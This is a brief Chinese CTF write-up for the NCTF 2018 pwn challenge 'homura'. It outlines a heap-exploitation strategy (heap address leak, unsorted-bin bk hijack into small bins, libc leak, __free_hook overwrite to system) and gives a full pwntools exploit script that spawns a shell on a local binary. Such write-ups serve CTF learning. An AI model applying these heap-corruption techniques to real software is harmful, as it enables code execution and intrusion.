By

 

文章目录
  1. 1. 思路
  2. 2. 完整exp

nctf2018的pwn题homura的exp思路及脚本

思路

1.通过name泄露heap地址
2.通过伪造劫持unsorted bin的bk伪造堆块到small-bins中(未校验fd指针也就是双向链表的合法性)
3.控制堆上的name和buf指针,leak libc 和 wirte free_hook

完整exp

from pwn import *

def ru(data,drop=False):
    return p.recvuntil(data,drop=drop)

def rl():
    return p.recvline()

def ra():
    return p.recvall()

def r(l):
    return p.recv(l)

def sl(data):
    p.sendline(data)

def s(data):
    p.send(data)

def ga(data,rd="\x0a"):
    ru(data)
    return u64(ru(rd,drop=True).ljust(8,"\x00"))

def g():
    gdb.attach(p)
    raw_input()

def ri():
    raw_input()

def gp():
    print proc.pidof(p)[0]
    ri()

def add(nl,n,ml,m):
    ru(">>")
    sl(str(1))
    ru("length of your name:")
    if nl==-1:
        sl(str(nl))
    else:  
        sl(str(nl))
        ru("your name:")
        s(n)
    ru("size of your message:")
    sl(str(ml))
    ru("please leave your message:")
    sl(m)

def remove(idx):
    ru(">>")
    sl(str(2))
    ru("index:")
    sl(str(idx))

def modfiy(idx,s,m):
    ru(">>")
    sl(str(3))
    ru("index:")
    sl(str(idx))
    ru("size:")
    sl(str(s))
    ru(">")
    sl(m)

def leak(idx,s,m):
    ru(">>")
    sl(str(3))
    ru("index:")
    sl(str(idx))
    ru("size:")
    sl(str(s))
    heap = ga('Hello ',' you')
    ru(">")
    sl(m)
    return heap


if __name__ == '__main__':
    # context.log_level = "debug"
    libc = ELF("./libc.so.6")
    p = process('./homura')
    add(12,'1'*10+'\n',0x90,'a'*0x80) #0
    add(12,'2'*10+'\n',0x90,'b'*0x80) #1
    add(12,'3'*10+'\n',0x90,'c'*0x80) #2
    remove(1)
    remove(0)
    add(-1,'',0x90,'d'*0x80) #0
    heap = leak(0,0x80,'x'*0x60)
    print hex(heap)
    add(12,'2'*10+'\n',0x90,'h'*0x80) #1
    #
    add(0x10,'4'*8+'\n',0xa0,'d'*0x60+p64(0)+p64(0xc1)+p64(heap+0x320)+p64(heap+0x420)) # 
    # 0           c1
    # xxx410    xxx510
    add(0x10,'5'*8+'\n',0xa0,'e'*0x20+p64(0xc0)+p64(0x91)) #4
    add(0x10,'6'*8+'\n',0xa0,'f'*0x80) #5
    add(0x10,'7'*8+'\n',0xa0,'g'*0x80) #6
    modfiy(4,0x80,'z'*0x10)
    remove(3)
    remove(4)
    remove(5)
    # gp()
    modfiy(4,0x80,p64(heap+0x220)+p64(heap+0x290))
    add(0x10,'8'*8+'\n',0x90,'h'*0x3) # 3
    add(0x10,'9'*8+'\n',0xa0,'k'*0x3) # 4
    add(0x10,'8'*8+'\n',0xa0,p64(0)*9+p64(0x21)+p64(heap+0x430)+p64(heap+0x330)) # 5
    main_arena = 0x3C4B20
    libc_addr = leak(4,0x80,'z') - 0x108 - main_arena 
    print hex(libc_addr)
    free_hook = libc_addr + libc.symbols['__free_hook']
    print hex(free_hook)
    system_addr = libc_addr + libc.symbols['system']
    add(0x10,'9'*8+'\n',0xa0,'x'*0x3) # 7
    # gp()
    remove(5)
    add(0x10,'/bin/sh\x00'+'\n',0xa0,p64(0)*9+p64(0x21)+p64(heap+0x430)+p64(free_hook))#5
    modfiy(4,0x10,p64(system_addr))
    # gp()
    remove(5)
    p.interactive()
文章目录
  1. 1. 思路
  2. 2. 完整exp